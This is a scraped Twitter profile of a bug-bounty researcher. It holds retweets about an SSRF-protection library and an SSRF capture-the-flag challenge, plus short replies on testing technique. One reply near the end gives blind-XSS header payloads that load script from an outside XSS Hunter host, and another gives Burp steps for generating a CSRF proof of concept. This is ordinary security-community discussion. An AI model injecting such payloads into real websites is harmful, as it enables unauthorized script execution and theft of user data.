smnf @smnfbb - Twitter Profile

smnfbb retweeted

over 3 years ago

We're definitely not your typical AppSec consultancy! https://t.co/j0xen4R61y https://t.co/9nU6heJgRa #infosecjobs #doyensec #appsec #career #notyourtypicalappsec Credit: @pmontesel

3

50

15

5

0

smnfbb retweeted

Doyensec @Doyensec

over 3 years ago

Announcing the release of `safeurl` - a library to help #golang devs "Build with Security"! This module provides tested & versatile protection against Server Side Request Forgery (SSRF)! Hurry and check it out! #doyensec #AppSec https://t.co/qbVeEHgIkm https://t.co/iJknyu32mB

Doyensec's tweet photo. Announcing the release of `safeurl` - a library to help #golang devs "Build with Security"! This module provides tested & versatile protection against Server Side Request Forgery (SSRF)! Hurry and check it out!

#doyensec #AppSec

https://t.co/qbVeEHgIkm
https://t.co/iJknyu32mB https://t.co/MfKSQDzPso

2

46

25

4

0

smnfbb retweeted

Doyensec @Doyensec

over 3 years ago

Help make safeurl even better (and safer). If you're the kind of person who can't wait to try to break a new library - connect to http://164.92.85.153/ and attempt to catch the flag on this internal (and unauthorized) URL: http://164.92.85.153/flag! You might win a cool prize :)

1

21

10

1

0

smnfbb retweeted

Doyensec @Doyensec

over 3 years ago

Learn a little about the Apache JServe Protocol (AJP) as well as how to interact with and fuzz it, in our latest research blog post from @ouadmoha . #appsec #doyensec #Apache #Security https://t.co/rYNMfvkQnf

Doyensec's tweet photo. Learn a little about the Apache JServe Protocol (AJP) as well as how to interact with and fuzz it, in our latest research blog post from @ouadmoha .

#appsec #doyensec #Apache #Security

https://t.co/rYNMfvkQnf https://t.co/eA2d5vw4oZ

0

19

12

5

0

Who to follow

Mediocre Swim Analyst

@mediocreanalyst

Swimming fan account (LCM abolitionist), I just complain about swimming, baseball, and football (sometimes politics). not affiliated with Hobson or Mijatovic

kuzushiki

@kuzu7shiki

CTFにハマったのでセキュリティ業界に就職しました

Dmeach

@dmeach2000

smnfbb retweeted

Doyensec @Doyensec

over 3 years ago

Happy Friday! Any weekend (appsec) plans? No Hat 22 talks are all at https://t.co/yXJCLjPAq5 Watch @lucacarettoni's best bugs show 📺🪲 (Web Security in 2022) https://t.co/m4pGzdvIOq #nohat2022

Doyensec's tweet photo. Happy Friday! Any weekend (appsec) plans? No Hat 22 talks are all at https://t.co/yXJCLjPAq5

Watch @lucacarettoni's best bugs show 📺🪲 (Web Security in 2022) https://t.co/m4pGzdvIOq

#nohat2022 https://t.co/tw1mUbfF7l

0

9

4

0

smnf @smnfbb

almost 4 years ago

@Bugcrowd

0

7

0

smnf @smnfbb

about 4 years ago

@gregxsunday Also in Burp you can right click on request -> Engagement tools -> generate CSRF PoC -> Options -> Cross-domain XHR -> Regenerate, and you should have JS code ready

0

23

3

12

0

smnf @smnfbb

about 4 years ago

@gregxsunday @Yassineaboukir Also did this :D

0

2

0

smnf @smnfbb

over 4 years ago

@jonathandata0

0

smnf @smnfbb

over 4 years ago

@phwd_ Mind sharing a link? Also, did they sent the invites yet?

2

0

smnf @smnfbb

over 4 years ago

@phwd_ What TURN methods you've tried here?

1

0

smnf @smnfbb

over 4 years ago

@phwd_ Still waiting

0

smnf @smnfbb

over 4 years ago

@cyb3rops Fun fact, there is already scripting feature in log4j config file. Time to report it to them and get a CVE😎 https://t.co/YJTyFd9NJ8

0

5

0

1

0

smnf @smnfbb

over 4 years ago

@manisashankm @ADITYASHENDE17 and then you would check DNS logs to see which domain was actually accessed. That could also show you what domain was searched, but XSS payload did not fire, indicating place to take a look into (2/2)

0

1

0

smnf @smnfbb

over 4 years ago

@manisashankm @ADITYASHENDE17 I guess if you host XSS hunter on your own server, you could connect different local subdomains to different headers. For example: "Header1: <script src=https://t.co/eGbRH9Gjph></script>" "Header2: <script src=https://t.co/c1oeflx2Dy></script>" (1/2)

1

2

0

smnf

@smnfbb

Who to follow

Last Seen Users on Sotwe

Trends for you

Most Popular Users